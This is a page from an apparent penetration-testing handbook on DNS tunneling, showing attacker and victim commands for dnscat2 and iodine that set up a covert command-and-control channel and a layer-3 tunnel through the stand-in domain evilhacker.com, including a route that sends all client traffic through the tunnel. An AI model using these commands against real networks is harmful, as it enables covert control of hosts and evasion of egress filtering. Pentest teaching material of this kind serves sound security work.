🦹
CYBERSECURITY BOOK
search
⌘Ctrlk
🦹
CYBERSECURITY BOOK
  • 👽CS && PEN-TESTING BOOK
    • 🔍Reconnaissance
    • 🔢Enumeration
    • ☮️Public Exploits
    • 🕎Vulnerability Scanning
    • 🕳️Tunneling & Exfiltration
      • SSH Tunneling
      • ICMP Exfiltration
      • DNS Exfiltration
      • DNS Tunneling
      • TCP/UDP Tunneling
      • CloudFlare Tunnel
      • SOCKS
      • Ngrok - Port Forwarding
      • CURL - Exfiltration
      • Rclone - Data Exfiltration
      • Data Bouncing - External Data Exfiltration
    • door-closedBackdoors
    • 🌠Exploiting VPNs
    • 🎣Pivoting (Post Exploitation)
    • 🎯Active Directory Pentesting
    • 🐳Docker
    • ☸️Kubernetes
    • 🙅‍♂️Social Engineering
    • 🗺️CEH Mindmaps
    • 🗾CND Mindmaps
    • 👿Vulnerability Research
    • 📶Network Security
    • 🛂Port Forwarding
    • 👾API Testing
    • 🕸️Web App Pentesting Notes
    • 🛩️Wireless Hacking
    • 🏁CEH Engage Walkthroughs
    • 🎃Evasion
    • 🚪Post exploitation
    • 🔓Hashing & Password Cracking
    • 📒Hacking Cheat Sheets
    • 🏇CEH Practical
    • ☁️Cloud Pentesting
    • 🪟Windows Security
    • 🐧Linux Security
    • 🍎MacOS Security
    • 📱Android Security
    • 🍎iOS Security
    • 🧾Scripting
    • 🐉Reverse Engineering & Malware Analysis
    • 🌠Protocol Exploitation
    • 🛜Network Pentesting
    • 👮Digital Forensics & Incident Response
    • 🦋Cisco Attacks
    • 🐼CVE's
    • 🐛OWASP TOP 10
    • 🛼Web 3 Vulnerabilities
    • 🛩️Web 3 Smart Contract
    • 🌃Smart Contract Audits
    • 👩‍💼GRC Frameworks
  • 🦹REAL WORLD && CTF
  • 🦸MISCELLANEOUS
  • 🧛‍♂️ADVANCED PERSISTENT THREATS - RESEARCH
  • 👾THREAT HUNTING - RESEARCH
  • 🦅CISA - INCIDENT RESPONSE PLAYBOOK
gitbookPowered by GitBook
block-quoteOn this pagechevron-down
githubEdit
  1. 👽CS && PEN-TESTING BOOKchevron-right
  2. 🕳️Tunneling & Exfiltration

DNS Tunneling

LogoGitHub - mosajjal/dnspot: End-to-end Encrypted DNS Tunnelling and C2 frameworkGitHubchevron-right

hashtag
Dnscat2

# Attacker
sudo dnscat2-server --dns domain=evilhacker.com

# Victim
dnscat2 --dns domain=evilhacker.com

hashtag
Commands

hashtag
Iodine

hashtag
References

  • https://github.com/iagox86/dnscat2arrow-up-right

  • https://github.com/yarrick/iodinearrow-up-right

PreviousDNS Exfiltrationchevron-leftNextTCP/UDP Tunnelingchevron-right

Last updated 1 year ago

  • Dnscat2
  • Commands
  • Iodine
  • References
# Attacker
window -i 1

help
# Attacker
sudo iodined 192.168.100.1 evilhacker.com -P password1

# Client (Not allowed to access internet)
# Creating a layer 3 vpn tunnel
sudo iodine evilhacker.com -P password1

sudo route add -net 0.0.0.0/0 gw 192.168.100.1 dns0

# now ping using the client machine
ping google.com

SUCCESS!